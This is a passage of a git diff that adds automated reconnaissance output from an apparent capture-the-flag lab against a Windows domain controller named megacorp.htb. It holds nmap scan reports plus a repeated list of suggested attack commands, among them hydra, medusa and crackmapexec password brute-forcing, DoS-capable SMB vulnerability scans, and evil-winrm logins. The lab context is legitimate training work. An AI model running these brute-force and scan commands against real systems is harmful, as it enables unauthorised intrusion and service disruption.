Microsoft Windows RPC over HTTP 1.0 +49695/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +49843/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port +OS fingerprint not ideal because: Missing a closed TCP port so results incomplete +No OS matches for host +TCP/IP fingerprint: +SCAN(V=7.93%E=4%D=10/28%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=653CFE48%P=x86_64-pc-linux-gnu) +SEQ(SP=101%GCD=1%ISR=10D%TI=I%II=I%SS=S%TS=U) +SEQ(SP=101%GCD=1%ISR=10D%TI=I%II=I%TS=U) +OPS(O1=M550NW8NNS%O2=M550NW8NNS%O3=M550NW8%O4=M550NW8NNS%O5=M550NW8NNS%O6=M550NNS) +WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70) +ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M550NW8NNS%CC=Y%Q=) +T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=) +T2(R=N) +T3(R=N) +T4(R=N) +U1(R=N) +IE(R=Y%DFI=N%TG=80%CD=Z) + +Network Distance: 2 hops +TCP Sequence Prediction: Difficulty=257 (Good luck!) +IP ID Sequence Generation: Incremental +Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows + +Host script results: +|_clock-skew: 0s +| p2p-conficker: +| Checking for Conficker.C or higher... +| Check 1 (port 25314/tcp): CLEAN (Timeout) +| Check 2 (port 10793/tcp): CLEAN (Timeout) +| Check 3 (port 25536/udp): CLEAN (Timeout) +| Check 4 (port 25523/udp): CLEAN (Timeout) +|_ 0/4 checks are positive: Host is CLEAN or ports are blocked +| smb2-time: +| date: 2023-10-28T12:27:13 +|_ start_date: N/A +| smb2-security-mode: +| 311: +|_ Message signing enabled and required + +TRACEROUTE (using port 135/tcp) +HOP RTT ADDRESS +1 35.29 ms 10.10.14.1 +2 35.21 ms megacorp.htb (10.129.243.131) + +Read data files from: /usr/bin/../share/nmap +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:27:52 2023 -- 1 IP address (1 host up) scanned in 246.21 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_manual_commands.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_manual_commands.txt new file mode 100644 index 00000000..58e88c23 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_manual_commands.txt @@ -0,0 +1,338 @@ +[*] domain on tcp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt + +[*] http on tcp/80 + + [-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists: + + feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt + + [-] Credential bruteforcing commands (don't run these without modifying them): + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message" + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message" + + [-] (nikto) old but generally reliable web server enumeration tool: + + nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt" + + [-] (wpscan) WordPress Security Scanner (useful if WordPress is found): + + wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt" + +[*] msrpc on tcp/135 + + [-] RPC Client: + + rpcclient -p 135 -U "" 10.129.243.131 + +[*] netbios-ssn on tcp/139 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/389 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt" + +[*] microsoft-ds on tcp/445 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Lookup SIDs + + impacket-lookupsid '[username]:[password]@10.129.243.131' + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/3268 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt" + +[*] wsman on tcp/5985 + + [-] Bruteforce logins: + + crackmapexec winrm 10.129.243.131 -d '' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt' + + [-] Check login (requires credentials): + + crackmapexec winrm 10.129.243.131 -d '' -u '' -p '' + + [-] Evil WinRM (gem install evil-winrm): + + evil-winrm -u '' -p '' -i 10.129.243.131 + + evil-winrm -u '' -H '' -i 10.129.243.131 + +[*] msrpc on tcp/49667 + + [-] RPC Client: + + rpcclient -p 49667 -U "" 10.129.243.131 + +[*] msrpc on tcp/49673 + + [-] RPC Client: + + rpcclient -p 49673 -U "" 10.129.243.131 + +[*] msrpc on tcp/49695 + + [-] RPC Client: + + rpcclient -p 49695 -U "" 10.129.243.131 + +[*] msrpc on tcp/49843 + + [-] RPC Client: + + rpcclient -p 49843 -U "" 10.129.243.131 + +[*] domain on tcp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt + +[*] http on tcp/80 + + [-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists: + + feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt + + [-] Credential bruteforcing commands (don't run these without modifying them): + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message" + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message" + + [-] (nikto) old but generally reliable web server enumeration tool: + + nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt" + + [-] (wpscan) WordPress Security Scanner (useful if WordPress is found): + + wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt" + +[*] msrpc on tcp/135 + + [-] RPC Client: + + rpcclient -p 135 -U "" 10.129.243.131 + +[*] netbios-ssn on tcp/139 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/389 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt" + +[*] microsoft-ds on tcp/445 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Lookup SIDs + + impacket-lookupsid '[username]:[password]@10.129.243.131' + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/3268 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt" + +[*] wsman on tcp/5985 + + [-] Bruteforce logins: + + crackmapexec winrm 10.129.243.131 -d '' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt' + + [-] Check login (requires credentials): + + crackmapexec winrm 10.129.243.131 -d '' -u '' -p '' + + [-] Evil WinRM (gem install evil-winrm): + + evil-winrm -u '' -p '' -i 10.129.243.131 + + evil-winrm -u '' -H '' -i 10.129.243.131 + +[*] domain on udp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default_manual.txt + +[*] domain on tcp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d megacorp.htb -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt + +[*] http on tcp/80 + + [-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists: + + feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt + + [-] Credential bruteforcing commands (don't run these without modifying them): + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message" + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message" + + [-] (nikto) old but generally reliable web server enumeration tool: + + nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt" + + [-] (wpscan) WordPress Security Scanner (useful if WordPress is found): + + wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt" + +[*] msrpc on tcp/135 + + [-] RPC Client: + + rpcclient -p 135 -U "" 10.129.243.131 + +[*] netbios-ssn on tcp/139 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/389 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt" + +[*] microsoft-ds on tcp/445 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Lookup SIDs + + impacket-lookupsid '[username]:[password]@10.129.243.131' + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/3268 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt" + +[*] wsman on tcp/5985 + + [-] Bruteforce logins: + + crackmapexec winrm 10.129.243.131 -d 'megacorp.htb' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt' + + [-] Check login (requires credentials): + + crackmapexec winrm 10.129.243.131 -d 'megacorp.htb' -u '' -p '' + + [-] Evil WinRM (gem install evil-winrm): + + evil-winrm -u '' -p '' -i 10.129.243.131 + + evil-winrm -u '' -H '' -i 10.129.243.131 + +[*] msrpc on tcp/49667 + + [-] RPC Client: + + rpcclient -p 49667 -U "" 10.129.243.131 + +[*] msrpc on tcp/49695 + + [-] RPC Client: + + rpcclient -p 49695 -U "" 10.129.243.131 + +[*] msrpc on tcp/49843 + + [-] RPC Client: + + rpcclient -p 49843 -U "" 10.129.243.131 + +[*] domain on udp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d megacorp.htb -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default_manual.txt + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_patterns.log b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_patterns.log new file mode 100644 index 00000000..e104793b --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_patterns.log @@ -0,0 +1,8 @@ +Identified Architecture: 64-bit + +Identified HTTP Server: Microsoft-IIS/10.0 + +Identified Architecture: 64-bit + +Identified HTTP Server: Microsoft-IIS/10.0 + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt new file mode 100644 index 00000000..f5299e55 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt @@ -0,0 +1,67 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:23:46 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.061s latency). +Scanned at 2023-10-28 14:23:46 CEST for 449s +Not shown: 988 filtered tcp ports (no-response) +PORT STATE SERVICE REASON VERSION +53/tcp open domain? syn-ack ttl 127 +80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 +|_http-title: Slandovia Energy +| http-methods: +| Supported Methods: OPTIONS TRACE GET HEAD POST +|_ Potentially risky methods: TRACE +88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-10-28 12:23:58Z) +135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn +389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +445/tcp open microsoft-ds? syn-ack ttl 127 +464/tcp open kpasswd5? syn-ack ttl 127 +593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 +636/tcp open tcpwrapped syn-ack ttl 127 +3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +3269/tcp open tcpwrapped syn-ack ttl 127 +Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port +OS fingerprint not ideal because: Missing a closed TCP port so results incomplete +No OS matches for host +TCP/IP fingerprint: +SCAN(V=7.93%E=4%D=10/28%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=653CFF13%P=x86_64-pc-linux-gnu) +SEQ(SP=108%GCD=1%ISR=10A%TS=U) +OPS(O1=M550NW8NNS%O2=M550NW8NNS%O3=M550NW8%O4=M550NW8NNS%O5=M550NW8NNS%O6=M550NNS) +WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70) +ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M550NW8NNS%CC=Y%Q=) +T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=) +T2(R=N) +T3(R=N) +T4(R=N) +U1(R=N) +IE(R=Y%DFI=N%TG=80%CD=Z) + +Network Distance: 2 hops +TCP Sequence Prediction: Difficulty=264 (Good luck!) +IP ID Sequence Generation: Busy server or unknown class +Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows + +Host script results: +| smb2-security-mode: +| 311: +|_ Message signing enabled and required +|_clock-skew: 0s +| smb2-time: +| date: 2023-10-28T12:30:36 +|_ start_date: N/A +| p2p-conficker: +| Checking for Conficker.C or higher... +| Check 1 (port 25314/tcp): CLEAN (Timeout) +| Check 2 (port 10793/tcp): CLEAN (Timeout) +| Check 3 (port 25536/udp): CLEAN (Timeout) +| Check 4 (port 25523/udp): CLEAN (Timeout) +|_ 0/4 checks are positive: Host is CLEAN or ports are blocked + +TRACEROUTE (using port 53/tcp) +HOP RTT ADDRESS +1 74.01 ms 10.10.14.1 +2 74.05 ms megacorp.htb (10.129.243.131) + +Read data files from: /usr/bin/../share/nmap +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:31:15 2023 -- 1 IP address (1 host up) scanned in 449.29 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt new file mode 100644 index 00000000..3c8842ba --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt @@ -0,0 +1,38 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:23:46 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.055s latency). +Scanned at 2023-10-28 14:23:46 CEST for 1767s +Not shown: 97 open|filtered udp ports (no-response) +PORT STATE SERVICE REASON VERSION +53/udp open domain udp-response (generic dns response: SERVFAIL) +| fingerprint-strings: +| NBTStat: +|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +88/udp open kerberos-sec udp-response Microsoft Windows Kerberos (server time: 2023-10-28 12:23:58Z) +123/udp open ntp udp-response ttl 127 NTP v3 +| ntp-info: +|_ receive time stamp: 2023-10-28T12:30:46 +1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : +SF-Port53-UDP:V=7.93%I=7%D=10/28%Time=653CFD6C%P=x86_64-pc-linux-gnu%r(NBT +SF:Stat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAA +SF:AAAAAAAA\0\0!\0\x01"); +Too many fingerprints match this host to give specific OS details +TCP/IP fingerprint: +SCAN(V=7.93%E=4%D=10/28%OT=%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=653D0439%P=x86_64-pc-linux-gnu) +U1(R=N) +IE(R=N) + +Network Distance: 2 hops +Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows + +Host script results: +|_clock-skew: 14s + +TRACEROUTE (using port 123/udp) +HOP RTT ADDRESS +1 44.38 ms 10.10.14.1 +2 57.06 ms megacorp.htb (10.129.243.131) + +Read data files from: /usr/bin/../share/nmap +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:53:13 2023 -- 1 IP address (1 host up) scanned in 